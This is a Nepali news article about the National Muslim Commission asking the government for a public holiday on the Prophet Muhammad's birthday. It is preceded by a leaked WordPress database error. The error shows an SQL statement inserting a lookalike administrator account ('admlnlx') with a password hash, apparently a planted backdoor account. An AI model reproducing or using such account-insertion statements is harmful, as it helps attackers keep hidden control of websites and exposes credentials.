WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BW7UfYv3OIoXWAqvykqphDzvcSUX7q/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-31 09:30:53', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ १३–
राष्ट्रिय मुस्लिम आयोगले इस्लाम धर्मका अन्तिम पैगम्बर हजरत मोहम्मद (स.अ) को जन्मोत्सव बारह रवि उल्अबलका दिन सार्वजनिक बिदा दिन सरकारसँग माग गरेको छ ।
आयोगको यहाँ बसेको बैठकले उक्त ‘मोहम्मद डे’ का दिन सार्वजनिक बिदा दिन सरकारसँग माग गरेको आयोगका सदस्यसचिव मोहम्मद खादि इकवाल इराकीले राससलाई बताउनुभयो ।
सरकारले मुस्लिम समुदायले मनाउने पर्वहरु इद र बकर इदमा सार्वजनिक बिदा दिनेगरेको छ । नेपाली मुस्लिम समुदायमा हौसला बढाउन र पैगम्बर हजरत मोहम्मदप्रति सम्मान व्यक्त गर्नका लागि आयोगको बैठकले सो दिन सार्वजनिक बिदा दिन प्रधानमन्त्री तथा मन्त्रिपरिषद्को कार्यालय (सार्वजनिक बिदा पुनरावलोकन समितिको सचिवालय) मार्फत सरकारलाई आग्रह गरेको हो ।